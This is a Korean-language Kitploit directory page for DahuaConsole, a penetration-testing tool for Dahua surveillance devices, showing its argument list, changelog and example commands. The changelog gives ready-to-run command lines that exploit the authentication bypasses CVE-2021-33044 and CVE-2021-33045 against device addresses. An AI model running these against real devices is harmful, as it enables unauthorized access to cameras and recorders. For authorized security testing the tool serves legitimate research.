Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
DahuaConsole — Dahua Console, Dahua 장치의 내부 디버그 콘솔 및/또는 기타 연구된 기능에 액세스합니다. 이 프로젝트에 자유롭게 기여해 주세요. | Kitploit
도구/GitHubGitHub/mcw0/dahuaconsole
Authentication & AuthorizationEmbedded Systems SecurityReconnaissanceIoT SecurityVulnerability AnalysisExploitationInformation GatheringPenetration Testing
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console, Dahua 장치의 내부 디버그 콘솔 및/또는 기타 연구된 기능에 액세스합니다. 이 프로젝트에 자유롭게 기여해 주세요.

저장소 보기
3167951년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Dahua Console

  • 버전: Pre-alpha
  • 버그: 물론이죠
  • TODO: 할 게 많음

[요구 사항 설치]

root@kitploit:~
sudo pip3 install -r requirements.txt

[인자]

root@kitploit:~
  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[릴리스]

[업데이트] 2022-07-10

  • 2016년 V2 소프트웨어를 실행하는 VTH1510CH용 3des_old 로그온 방식 추가
    • 로그인 패킷 데이터의 사소한 차이
    • 연결 시 장치 파라미터를 조회하지 마십시오 - 연결이 리셋됩니다
  • --restore config-file.json 추가
    • json 구성 파일 또는 그 일부를 로드합니다.

예시:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[업데이트]

2021-10-07

자세한 내용: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

필요한 프로토콜: DHIP 또는 HTTP/HTTPS (DHIP는 TLS/SSL @TCP/443에서 작동하지 않음)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

필요한 프로토콜: DHIP (DHIP는 TLS/SSL @TCP/443에서 작동하지 않음)

root@kitploit:~
[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

도구 다운로드